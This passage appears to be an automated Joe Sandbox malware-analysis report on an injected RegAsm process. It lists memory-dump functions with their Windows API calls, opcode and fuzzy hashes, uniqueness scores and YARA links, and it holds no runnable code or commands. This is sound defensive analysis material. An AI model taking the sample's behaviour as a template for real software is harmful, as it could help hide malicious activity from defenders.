Instruction ID: 2a2135cb2b61bcf5ac9bb0d01410ee266ac9a5107d44b372f044b67a8bd0dad4
Opcode Fuzzy Hash: 1069b2b94158c9e3f598a1d91a49fed0dc276295e4bd54f266ae3489f68d54cc
Instruction Fuzzy Hash: 12013CD294E7F099DF33673808D97563EA15BB3502F5A02D8D5835E48AE0940450DBB3

Uniqueness

Uniqueness Score: 1.31%

Function 1FD2AAEE, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1FD2AB32

Memory Dump Source

Source File: 0000000A.00000002.16908722186.000000001FD2A000.00000040.00000001.sdmp, Offset: 1FD2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1fd2a000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 768d59ed677243c0debf9e514e92dbbb515379adad56df6614153463e2a6ed9b
Instruction ID: 30895b1870cd1af89636ce7610d19723f975a6a7c7358574e522e89a78a91344
Opcode Fuzzy Hash: 768d59ed677243c0debf9e514e92dbbb515379adad56df6614153463e2a6ed9b
Instruction Fuzzy Hash: D501AD31400740DFDB208F95DC84B56FBE1EF08720F08C69AED894A661D376A014CFA2

Uniqueness

Uniqueness Score: 0.12%

Function 01127964, Relevance: 1.5, APIs: 1, Instructions: 44libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8802EDAC,?,01128D4D,0112016E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF), ref: 011279A4

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0be0ff3ba2a8b15b5bf71cae14d625139b3bd12dc4fecce6e914cdbd418705de
Instruction ID: f915b265eef87e4970c2de479eca048153b8e67df6c64b85bd6e60d4d81fe856
Opcode Fuzzy Hash: 0be0ff3ba2a8b15b5bf71cae14d625139b3bd12dc4fecce6e914cdbd418705de
Instruction Fuzzy Hash: 8CF0FFC294FBF1998F27A62840A83573EA049B311238B46D9C0830E84AE1980120EBB3

Uniqueness

Uniqueness Score: 0.02%

Function 229244A2, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

FindWindowW.USER32(?,?), ref: 229244E7

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: 39cff9ca0ba85d019d9ef673792e846dd6ab85211e49229793459cf23614e590
Instruction ID: d85f32d0ffb90a6934cf3d23bacfefc1d806c53133d91fc52b09994d2403e2b5
Opcode Fuzzy Hash: 39cff9ca0ba85d019d9ef673792e846dd6ab85211e49229793459cf23614e590
Instruction Fuzzy Hash: 3201BC356007408FE710CF1ADD85B52FBE8EF06720F08C29ADD488B30AE274E504CB62

Uniqueness

Uniqueness Score: 1.34%

Function 229210C2, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNELBASE(?,00000EAC,?,?), ref: 22921112

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 9763bc0eed4fdda87672af3f3ff9c5e69295492e47de1a3d9680f331cb71691f
Instruction ID: 60047eda834569eb14cccc9be4673162e67ffea16e30eee262a06dce85ddd0d6
Opcode Fuzzy Hash: 9763bc0eed4fdda87672af3f3ff9c5e69295492e47de1a3d9680f331cb71691f
Instruction Fuzzy Hash: 34018B71A00204ABD350DF16CC82B26FBB8EF89A20F14825AED084B741D371FA15CBE6

Uniqueness

Uniqueness Score: 0.05%

Function 229215E6, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(?), ref: 22921618

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 02400102da416ba22f6371a0fb01230fece1eb5a99f67cf317409a4692ee9ef7
Instruction ID: 3e843bf53d1a832d075ecb554a48f704c0695c8f61c1579f20c7cf67a3de3e89
Opcode Fuzzy Hash: 02400102da416ba22f6371a0fb01230fece1eb5a99f67cf317409a4692ee9ef7
Instruction Fuzzy Hash: B901DF316047449FEB008F19E88879AFBA8DF00320F08C2AADC488B766D7B5E554CF62

Uniqueness

Uniqueness Score: 0.55%

Function 2292192A, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000EAC,?,?), ref: 2292197A

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 60638cc8f82a5815a848a78033da448d414721d5310e7cb9a9c34dab5c6a4e0b
Instruction ID: 77312a98218210b31d2ae1a84a7a57b8bb7c87a953e74790a43b15b6153bb484
Opcode Fuzzy Hash: 60638cc8f82a5815a848a78033da448d414721d5310e7cb9a9c34dab5c6a4e0b
Instruction Fuzzy Hash: AA018B71A00204ABD310CF16CC82B26FBB8EF89A20F14825AED084B741D371F915CBE6

Uniqueness

Uniqueness Score: 0.02%

Function 01122B9D, Relevance: 1.5, APIs: 1, Instructions: 40threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNELBASE(000000FE,00000000), ref: 01122BF0

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 0b8b60c51d5522ad711cce3f66e9afc795ef4af90a9b2da0455a1d573f43d1c9
Instruction ID: 47201b63a44751a1861b4f3ac21eb795167c3cffb1b59097dbe838d426e6b3f3
Opcode Fuzzy Hash: 0b8b60c51d5522ad711cce3f66e9afc795ef4af90a9b2da0455a1d573f43d1c9
Instruction Fuzzy Hash: 6AF0ABD294E7F099DF33A76804A97463EA05BB3512F9A03C8D5975E84AE1940460DBB3

Uniqueness

Uniqueness Score: 1.31%

Function 1FD2B092, Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNELBASE ref: 1FD2B0C1

Memory Dump Source

Source File: 0000000A.00000002.16908722186.000000001FD2A000.00000040.00000001.sdmp, Offset: 1FD2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1fd2a000_RegAsm.jbxd

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: 33c5357a650ce5574ac5a4cfa5300402ac43cdd1f46a8b18f1bd40465991317a
Instruction ID: 75088f2e4d7250839f059e6bf27df446cb0a5ae122806cf7e83d4c56947c8043
Opcode Fuzzy Hash: 33c5357a650ce5574ac5a4cfa5300402ac43cdd1f46a8b18f1bd40465991317a
Instruction Fuzzy Hash: A701AD346043848FD740CF69E984762FBA0DF41324F48C1AADC488F246D6B5A444CBA2

Uniqueness

Uniqueness Score: 3.15%

Function 1FD2A25E, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 1FD2A290

Memory Dump Source

Source File: 0000000A.00000002.16908722186.000000001FD2A000.00000040.00000001.sdmp, Offset: 1FD2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1fd2a000_RegAsm.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 9f1acc3249e15215ee9c24ddc5d30ffb772607e44bd95a20ee5dbfd0bfc8400c
Instruction ID: f6955c8d1ba04be9a56d4a9a708188df3b05caed1e98219161ac76a959a9b0d5
Opcode Fuzzy Hash: 9f1acc3249e15215ee9c24ddc5d30ffb772607e44bd95a20ee5dbfd0bfc8400c
Instruction Fuzzy Hash: C0F0DC349082448FE7508F59D884761FBA0EF04324F48C19ADC880F312D3B6A448CEA2

Uniqueness

Uniqueness Score: 0.01%

Function 011249AC, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(01120817,80000000,00000001,00000000,00000003,00000000,00000000,01124956,01124A23,01120817), ref: 011249C8

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: acf17b4da03a2fb81a1ec152f2cb08de165f4e5c1b6a15666822d2b8f1d099cf
Instruction ID: a7e2fae8a43ff1fb100d5cba9e45ec6553a37e27aa1d5c59b5aab29829969807
Opcode Fuzzy Hash: acf17b4da03a2fb81a1ec152f2cb08de165f4e5c1b6a15666822d2b8f1d099cf
Instruction Fuzzy Hash: C6C04C71B90340BAFA388A10CD5BF9E65169B90F00F25442CBB497D0C097F5AA50D519

Uniqueness

Uniqueness Score: 0.01%

Function 011229D4, Relevance: 1.4, APIs: 1, Instructions: 119sleepthreadUNIQUE

Download Yara Rule

APIs

Sleep.KERNELBASE(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_0000B62B,00000000,00000000,00000000), ref: 01122B36
TerminateThread.KERNELBASE(000000FE,00000000), ref: 01122BF0

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: SleepTerminateThread
String ID:
API String ID: 480259992-0
Opcode ID: e07c344058d46b04ee84586e635d8e1836aef1da4baeb2007da1b1bc5396acba
Instruction ID: 9f0359f4f202821a7c0124cbeeb155b5cd372786294ad05e05b6cdc38c57d6f7
Opcode Fuzzy Hash: e07c344058d46b04ee84586e635d8e1836aef1da4baeb2007da1b1bc5396acba
Instruction Fuzzy Hash: 2131EAD194EBF0DDDF3B662844E87562EA05FB3102F5A42D9D5870EC4AE6984070DBB3

Uniqueness

Uniqueness Score: 100.00%

Function 01122A7C, Relevance: 1.3, APIs: 1, Instructions: 70sleepthreadUNIQUE

Download Yara Rule

APIs

Sleep.KERNELBASE(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_0000B62B,00000000,00000000,00000000), ref: 01122B36
TerminateThread.KERNELBASE(000000FE,00000000), ref: 01122BF0

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: SleepTerminateThread
String ID:
API String ID: 480259992-0
Opcode ID: ba25d2679228d0af62bbcdc64de9accdf0e746750350af103de327ad1323ee5d
Instruction ID: ee01c0f0dbcd7e3ad51e33b801e6f4b38af9137a2bd12f0dd1504020d8b96aa2
Opcode Fuzzy Hash: ba25d2679228d0af62bbcdc64de9accdf0e746750350af103de327ad1323ee5d
Instruction Fuzzy Hash: E311EFE190DBF4C9DF3F662444A875A2EA09BB3202F5641D9D5430EC96D6A84460DBB3

Uniqueness

Uniqueness Score: 100.00%

Function 01122AE1, Relevance: 1.3, APIs: 1, Instructions: 60sleepthreadUNIQUE

Download Yara Rule

APIs

Sleep.KERNELBASE(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_0000B62B,00000000,00000000,00000000), ref: 01122B36
TerminateThread.KERNELBASE(000000FE,00000000), ref: 01122BF0

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: SleepTerminateThread
String ID:
API String ID: 480259992-0
Opcode ID: 717cf52a5d2a5125f40886b7b66464a66d7982518690dafb0ad75f53b8b80ea7
Instruction ID: 52cb61f830c13fcccfbbf52c200c828856d56dbc558bb2079f9f8916e0fc007c
Opcode Fuzzy Hash: 717cf52a5d2a5125f40886b7b66464a66d7982518690dafb0ad75f53b8b80ea7
Instruction Fuzzy Hash: 7A11B1D190EBF0CDDF2BA72840E87162EA05BB3102B9B41C9C4830EC4AE6984470DBB3

Uniqueness

Uniqueness Score: 100.00%

Function 1FAA0C0B, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16908485599.000000001FAA0000.00000040.00000040.sdmp, Offset: 1FAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1faa0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32befafccd75fe3a524ae7d6486641a3eaa8a0932f1622a27339bf01309047d3
Instruction ID: f2fd2b5815db82aa340c497f428544dc72a581f749cc35605404379d65a7ea2b
Opcode Fuzzy Hash: 32befafccd75fe3a524ae7d6486641a3eaa8a0932f1622a27339bf01309047d3
Instruction Fuzzy Hash: 87216F355497C18FD707CB20D950B41BFB1AF87308F2986DAD4898B6A3C33E991ACB52

Uniqueness

Uniqueness Score: 0.00%

Function 1FAA0C44, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16908485599.000000001FAA0000.00000040.00000040.sdmp, Offset: 1FAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1faa0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85736dfdf6b53f7913d182c274740ad3666a507e8fc496b2b3db0c14287f6567
Instruction ID: 7fb263c5146fe65f1dc9d8ac6b1ba150d1cf3275acf0c98261d61964d634b517
Opcode Fuzzy Hash: 85736dfdf6b53f7913d182c274740ad3666a507e8fc496b2b3db0c14287f6567
Instruction Fuzzy Hash: B311E131284280DFD301CF24CA40B16BB92AF88718F24CA9CE94D0B352C77FE817CA52

Uniqueness

Uniqueness Score: 0.00%

Function 22943781, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16916467751.0000000022940000.00000040.00000001.sdmp, Offset: 22940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22940000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b59ed8d5cb00476dd78d591d4fd971ee7d267c41177e26411161146af9a4b9f
Instruction ID: 4db4b9db5c66783c82aab66935a3b7cea210660fac25eb1e7c69713aa360a526
Opcode Fuzzy Hash: 2b59ed8d5cb00476dd78d591d4fd971ee7d267c41177e26411161146af9a4b9f
Instruction Fuzzy Hash: 3B11D7B5908301AFD350CF19D881A5BFBE4FF89660F04896EF89897311D331E9048FA2

Uniqueness

Uniqueness Score: 0.00%

Function 22942D19, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16916467751.0000000022940000.00000040.00000001.sdmp, Offset: 22940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22940000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ce85c750901f96ec1df421fdcc46f678ba827998310464498654def1efe4399
Instruction ID: 72fe9fe006dd18d4ac9cc2d93cf8b23e699a4388a9937e8a44480cae05d35cbc
Opcode Fuzzy Hash: 6ce85c750901f96ec1df421fdcc46f678ba827998310464498654def1efe4399
Instruction Fuzzy Hash: 8711D7B5908301AFD350CF19D881A5BFBE4FF89660F04896EF99897311D331E9048FA2

Uniqueness

Uniqueness Score: 0.00%

Function 2294361C, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16916467751.0000000022940000.00000040.00000001.sdmp, Offset: 22940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22940000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d21e0cfec2858c430b39a1c199e870c547a414ddf3a8ec34e52d3e98cf7a2c2
Instruction ID: 8d7631b38c4c6085bd6c8dab1d3dced7e96c2e1ff1a4800336989724475953de
Opcode Fuzzy Hash: 9d21e0cfec2858c430b39a1c199e870c547a414ddf3a8ec34e52d3e98cf7a2c2
Instruction Fuzzy Hash: 7A11D6B5608305AFD350CF49DC81A5BFBE8EB89660F04C92EF99997311D271E9048FA2

Uniqueness

Uniqueness Score: 0.00%

Function 1FAA05DF, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16908485599.000000001FAA0000.00000040.00000040.sdmp, Offset: 1FAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1faa0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c21bf1a6915a3b7288402eabb3b9b24e9e4a920fc275629513dab04ed9d4ab39
Instruction ID: f4b0b4204b74f957ca5fa28da1eb8cfa4320c1dfd04407ab5df7857abdf6fdbc
Opcode Fuzzy Hash: c21bf1a6915a3b7288402eabb3b9b24e9e4a920fc275629513dab04ed9d4ab39
Instruction Fuzzy Hash: 1601A2B65087845FD7118B06AC41863FFA8DE86220708C59FEC898B612D225A908CB66

Uniqueness

Uniqueness Score: 0.00%

Function 1FAA0D00, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16908485599.000000001FAA0000.00000040.00000040.sdmp, Offset: 1FAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1faa0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4d94bddf5e8151b2cce4104d7e75b6d546bf637bea75ddc020519c1ed6e25be
Instruction ID: c29f9fbbe35b43898923da74868d9e00594103d55c40c146a2ad21e371d3a1a1
Opcode Fuzzy Hash: e4d94bddf5e8151b2cce4104d7e75b6d546bf637bea75ddc020519c1ed6e25be
Instruction Fuzzy Hash: 27F0FB35144685DFC205CF10D540B15FBA2EB89718F24C6ADE9491B652C73BE927DA81

Uniqueness

Uniqueness Score: 0.00%

Function 1FAA0606, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16908485599.000000001FAA0000.00000040.00000040.sdmp, Offset: 1FAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1faa0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa0d508237781a637902944b0029befd50701736425e6d2581193e8d3a6857f2
Instruction ID: f77f300502f705d64fe646c85f635b6b34eba5b7ad4d937087dfd84d82abec5f
Opcode Fuzzy Hash: aa0d508237781a637902944b0029befd50701736425e6d2581193e8d3a6857f2
Instruction Fuzzy Hash: ECE06DB66046048F9650CF0AEC81452F7A4EF85630B18C56FDC098B700D675B5048AA2

Uniqueness

Uniqueness Score: 0.00%

Function 2294308F, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16916467751.0000000022940000.00000040.00000001.sdmp, Offset: 22940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22940000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efb14b66a764dfe94462973752092ab4d53de210aa9494b8e444812a91a36ae8
Instruction ID: 82ebede9fcc1cc79f1d2f7c52b2b5105963f3298f7ba167512fdd41387d504b0
Opcode Fuzzy Hash: efb14b66a764dfe94462973752092ab4d53de210aa9494b8e444812a91a36ae8
Instruction Fuzzy Hash: 0CE0D8726502046BD2108E069C82F13FB98DF81A30F04C557ED081B302E172B514CAE1

Uniqueness

Uniqueness Score: 0.00%

Function 229437E3, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16916467751.0000000022940000.00000040.00000001.sdmp, Offset: 22940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22940000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c33307ba64eb62860d020dae9c5e0e690d54ea2ce362ac67fa0740febaf193
Instruction ID: dd946113b94ac63fc3ec9a88af494881736936f9a88e36e7e94e577a7735fa50
Opcode Fuzzy Hash: c6c33307ba64eb62860d020dae9c5e0e690d54ea2ce362ac67fa0740febaf193
Instruction Fuzzy Hash: A9E0D8B26502046BD2508F069C82F13FB98DF85A30F04C567ED081B301E172B5148AF1

Uniqueness

Uniqueness Score: 0.00%

Function 22942D7B, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16916467751.0000000022940000.00000040.00000001.sdmp, Offset: 22940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22940000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f50e2f8d8cd5c52c2043d276ab9407c381bb8185dc90f6351668a4405d49a4d
Instruction ID: 6be0497304597f4544cc799ba4c12b9c838adfff41333b74697c2d779f3d359d
Opcode Fuzzy Hash: 6f50e2f8d8cd5c52c2043d276ab9407c381bb8185dc90f6351668a4405d49a4d
Instruction Fuzzy Hash: 83E0D8726102046BD2108F069C82F23F758DF81A30F04C557ED081F302E172B5148AE1

Uniqueness

Uniqueness Score: 0.00%

Function 2294366B, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16916467751.0000000022940000.00000040.00000001.sdmp, Offset: 22940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22940000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5309361eec7f4f86b44c67666a3d82abab997faa9d9a178c743041c6499dc03a
Instruction ID: 7f4c083dbcfe6ee22e481ae1649e0e89f87d1ca7f57b56969b837a9c0b8d39f4
Opcode Fuzzy Hash: 5309361eec7f4f86b44c67666a3d82abab997faa9d9a178c743041c6499dc03a
Instruction Fuzzy Hash: 3FE0D8726002046BD2508E069C82F13FB98DF41A30F04C55BED091B302E172B5148AF1

Uniqueness

Uniqueness Score: 0.00%

Function 1FD223F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16908675330.000000001FD22000.00000040.00000001.sdmp, Offset: 1FD22000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1fd22000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebb3b4700be5d60be1b43c5b89c01d9188b30a1d680ec89bfadcb8070cd4e835
Instruction ID: b40153a28b5c341a09b6693f4fca8a05fb5ded925ad7999906a46968bd0b7d67
Opcode Fuzzy Hash: ebb3b4700be5d60be1b43c5b89c01d9188b30a1d680ec89bfadcb8070cd4e835
Instruction Fuzzy Hash: C5D05B756047C14FE3028E18C151B9537D46B91705F8244F9E8008B663C368E581D550

Uniqueness

Uniqueness Score: 0.00%

Function 1FD223BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16908675330.000000001FD22000.00000040.00000001.sdmp, Offset: 1FD22000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1fd22000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac816575ffba56ba5fd78f7f7f80949c9fbdf920894044b040700b109fd016cf
Instruction ID: 64b01b9679354b14c3ba4084618639cad658e04dbd6020444d3cb76232825714
Opcode Fuzzy Hash: ac816575ffba56ba5fd78f7f7f80949c9fbdf920894044b040700b109fd016cf
Instruction Fuzzy Hash: F9D05E346003814BE705DA0CC1D0FAA37D4AF80709F0244EDBC118B662C7B5E980CA40

Uniqueness

Uniqueness Score: 0.00%

Non-executed Functions

Function 22CFCA70, Relevance: 6.6, Strings: 5, Instructions: 301UNIQUE

Download Yara Rule

Strings

`O=s, xrefs: 22CFCDA0
`O=s, xrefs: 22CFCB24
`O=s, xrefs: 22CFCDEB
`O=s, xrefs: 22CFCBD1
`O=s, xrefs: 22CFCB76

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID: `O=s$`O=s$`O=s$`O=s$`O=s
API String ID: 0-2785870281
Opcode ID: 22f22e12ea40cd4786174cbf43b842c9d68c129cdafb6e23686abcaf51509897
Instruction ID: c4edb99664f47044283bef5b296b9021fc2782872e6dae2d9c696f7939e193a1
Opcode Fuzzy Hash: 22f22e12ea40cd4786174cbf43b842c9d68c129cdafb6e23686abcaf51509897
Instruction Fuzzy Hash: B1B19170B003089BE758DBB9C850B6EB6E7AFC8304F24C569D509AB3D5DE72AD01DB91

Uniqueness

Uniqueness Score: 100.00%

Function 22CFCAC1, Relevance: 6.5, Strings: 5, Instructions: 291UNIQUE

Download Yara Rule

Strings

`O=s, xrefs: 22CFCDA0
`O=s, xrefs: 22CFCB24
`O=s, xrefs: 22CFCDEB
`O=s, xrefs: 22CFCBD1
`O=s, xrefs: 22CFCB76

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID: `O=s$`O=s$`O=s$`O=s$`O=s
API String ID: 0-2785870281
Opcode ID: 43fca3929231890a948fdf50c9d7ffcd48bc5d8a694e7f50370313c5b4f6d154
Instruction ID: 8b4f61d64860435e4ec5629d1ddc9bfb94deb66538ce9d5eaf30a38e2dc6d241
Opcode Fuzzy Hash: 43fca3929231890a948fdf50c9d7ffcd48bc5d8a694e7f50370313c5b4f6d154
Instruction Fuzzy Hash: C6B1A070B003189BE758DBB9C850B6EB6E7AFC8304F24C569D109AB3D5DE72AD01DB91

Uniqueness

Uniqueness Score: 100.00%

Function 22CFA360, Relevance: 4.2, Strings: 3, Instructions: 420UNIQUE

Download Yara Rule

Strings

`O=s, xrefs: 22CFA8C4
`O=s, xrefs: 22CFA888
`O=s, xrefs: 22CFB6BA

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID: `O=s$`O=s$`O=s
API String ID: 0-1408378072
Opcode ID: 8f0dec85eb8c8cc0c35fb5aff4c02ee0d4409f4e01f5165b3018e31bdd7b01d0
Instruction ID: 5be1e0dc0a6d4a05d04ef5a4d7d189985bb4cd2b15f09aa3e791ef578b04d3d0
Opcode Fuzzy Hash: 8f0dec85eb8c8cc0c35fb5aff4c02ee0d4409f4e01f5165b3018e31bdd7b01d0
Instruction Fuzzy Hash: AE129474E00329CFDBA4CF69C980B9AB7B1BF88304F5085EAD509AB255DB319E85CF51

Uniqueness

Uniqueness Score: 100.00%

Function 01121AA2, Relevance: 1.9, APIs: 1, Instructions: 378threadCOMMON

Download Yara Rule

APIs

Part of subcall function 01127526: LoadLibraryA.KERNELBASE(?,8802EDAC,?,01128D4D,0112016E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF), ref: 011279A4

TerminateThread.KERNELBASE ref: 011228A1

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: LibraryLoadTerminateThread
String ID:
API String ID: 3464572979-0
Opcode ID: 5f0ed0e74d55d5b595070a4eed65d9543ba9c8f06eba7df3d2b41cb1230b8d00
Instruction ID: 6ec7e51862930a4d7cddb84557d6bd1e7a317ad1ade5fad334dbc5f67d698ec9
Opcode Fuzzy Hash: 5f0ed0e74d55d5b595070a4eed65d9543ba9c8f06eba7df3d2b41cb1230b8d00
Instruction Fuzzy Hash: 3BC18271704622ABE76CDE28CCC0FEEB3A4FF55314F168225E85997641CB34A865CB92

Uniqueness

Uniqueness Score: 1.31%

Function 011224B4, Relevance: 1.6, APIs: 1, Instructions: 139threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNELBASE ref: 011228A1

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

